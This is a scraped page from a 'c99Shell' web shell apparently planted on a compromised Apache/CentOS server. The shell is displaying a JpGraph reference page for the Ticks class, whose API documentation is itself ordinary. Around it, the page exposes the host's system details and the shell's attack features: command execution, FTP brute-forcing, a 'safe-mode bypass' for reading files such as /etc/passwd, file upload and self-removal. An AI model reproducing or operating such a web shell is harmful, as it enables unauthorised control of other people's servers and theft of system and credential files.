!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/ref/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Ticks.html (19.09 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

CLASS Ticks
(Defined in: jpgraph.php : 4106)
 Ticks 
 Set() 
 SetColor() 
 SetFormatCallback() 
 SetLabelFormat() 
 SetSide() 
 SetSize() 
 SetWeight() 
 SupressFirst() 
 SupressLast() 
 SupressMinorTickMarks() 
 SupressTickMarks() 
 SupressZeroLabel() 
 

Class usage and Overview
This is the abstract base class for ticks. Specifying the common signature for both linear and logartihmic ticks. Ticks are normally a property of the scale and can be accessed via the $graph->scale->ticks property.

 


Class Methods

 

 

Set the distance between major and minor tick marks

ArgumentDefaultDescription
$aMaj  Distance (world coordinates) for major tick marks
$aMin  Distance (world coordinates) for minor tick marks

Description
Set the distance between major and minor tick marks. Note that when the scale is specified manually then the tick marks must also be specified manually. 
 
See also
Graph::SetScale

Example

$graph->yaxis->scale->ticks->Set(10,5);

 

 

Set color for tick marks

ArgumentDefaultDescription
$aMajorColor  Major tick mark color
$aMinorColor "" Minor tick mark color

Description
Specify tick mark colors. If no minor tick mark color is specified then it will be the same as the major tick marks color. 

Example

$graph->yaxis->scale->ticks->SetColor('red','black');

 

 

Specify a format callback function for labels

ArgumentDefaultDescription
$aCallbackFuncName  name of function

Description
Specifies a callback function which will be called and given each tick label in turn as the argument. The callback function is supposed to return a proper formatted label to be displayed. Note: There is a shortcut to this method through the Axis::SetLabelFormatCallback. Note 2: The PHP function number_format() is often usefull in callback functions.  
 
See also
Axis::SetLabelFormatCallback

Example

// Callback function for Y-scale. Use money format with
// a ',' to separate 1000:s
function yScaleCallback($aVal) {
    return number_format($aVal);
}


// Short for $graph->yaxis->scale->ticks->SetFormatCallback()
$graph->yaxis->SetLabelFormatCallback('yScaleCallback');


 

 

Set format string for automatic labels

ArgumentDefaultDescription
$aFormatString  Specify a printf() style format string

Description
Specify a printf() style format string. Note: Can also be called trough the shortcut Axis::SetLabelFormatString()  
 
See also
Ticks::SetFormatCallback

Example

$graph->yaxis->SetLabelFormatString("%-02.1f");

 

 

Specify side of axis for ticks

ArgumentDefaultDescription
$aSide  Side

Description
Synonym for SetDirection(). Specify what side of the axis the tick marks should be drawn on. For Y -axis the possible directions are
  • SIDE_LEFT
  • SIDE_RIGHT
and for X-axis the possible parameters are
  • SIDE_UP
  • SIDE_DOWN
 
 
See also
Axis::SetTickSide, Axis::SetLabelSide and Axis::SetTitleSide

Example

$graph->xaxis->scale->ticks->SetSide(SIDE_UP);

 

 

Specify absolute size of tick marks in pixels

ArgumentDefaultDescription
$aMajSize  Major tick size
$aMinSize 3 Minor tick size

Description
Specify absolute size of tick marks in pixels 

Example

$graph->xaxis->scale->ticks->SetSize(8,3);

 

 

Specify width of tick marks

ArgumentDefaultDescription
$aWeight  Width (in pixels)

Description
Specify width of tick marks 

Example

$graph->xaxis->scale->ticks->SetWeight(2);

 

 

Hide the first tick mark

ArgumentDefaultDescription
$aHide true True=Hide the vbery first tick mark on the axis

Description
Hide the first tick mark on the axis. 
 
See also
Ticks::SupressLast

Example

$graph->xaxis->scale->ticks->SupressFirst();

 

 

Hide the last tick mark

ArgumentDefaultDescription
$aHide true True=Hide the last tick mark

Description
Hide the last tick mark on the axis 
 
See also
Ticks::SupressFirst

 

 

Hide all minor tick marks

ArgumentDefaultDescription
$aHide true True=Hide minor tick marks

Description
Hide all minor tick marks 

 

 

Hide major tick marks

ArgumentDefaultDescription
$aHide true True=Hide major tick marks

Description
Hide major tick marks 
 
See also
Ticks::SupressMinorTickMarks

 

 

Don't display the first zero label

ArgumentDefaultDescription
$aFlag true True=Hide zero-label

Description
Hide any label with numeric value == 0.0 



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.011 ]--